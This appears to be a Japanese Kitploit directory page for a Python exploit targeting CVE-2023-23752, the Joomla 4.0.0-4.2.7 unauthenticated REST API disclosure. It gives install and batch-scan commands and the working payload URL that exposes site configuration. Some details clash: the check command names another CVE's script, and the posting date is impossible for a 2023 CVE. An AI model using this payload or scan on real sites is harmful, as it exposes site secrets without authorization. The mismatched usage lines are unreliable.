Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-23752 — CVE-2023-23752のPythonベースのエクスプロイト。Joomla 4.0.0-4.2.7の不正なREST APIアクセスを標的とし、細工されたペイロードによる機密情報の開示を可能にします。 | Kitploit
ツール/GitHubGitHub/ytxzx/cve-2023-23752
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubytxzx/cve-2023-23752

CVE-2023-23752

CVE-2023-23752のPythonベースのエクスプロイト。Joomla 4.0.0-4.2.7の不正なREST APIアクセスを標的とし、細工されたペイロードによる機密情報の開示を可能にします。

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23752 - Joomla 未承認アクセス脆弱性の再現

スクリプトの使い方

Pythonライブラリのインストール

pip install -r requirements.txt

脆弱性の検証

python3 CVE-2022-26134_check.py -u url -c whoami

image

バッチスキャン

python3 CVE-2023-23752.py -f url_part.txt

image

影響を受けるバージョン

4.0.0 <= Joomla <= 4.2.7

脆弱性の再現

payload:

/api/index.php/v1/config/application?public=true

脆弱性のあるURLにアクセスし、パケットをキャプチャしてリプレイします

image

脆弱性の原理

Joomla! CMS バージョン4.0.0~4.2.7では、Webサービスエンドポイントへのアクセス制限が不適切なため、REST APIへの未承認アクセスが発生し、機密情報が漏えいする可能性があります。

ツールをダウンロード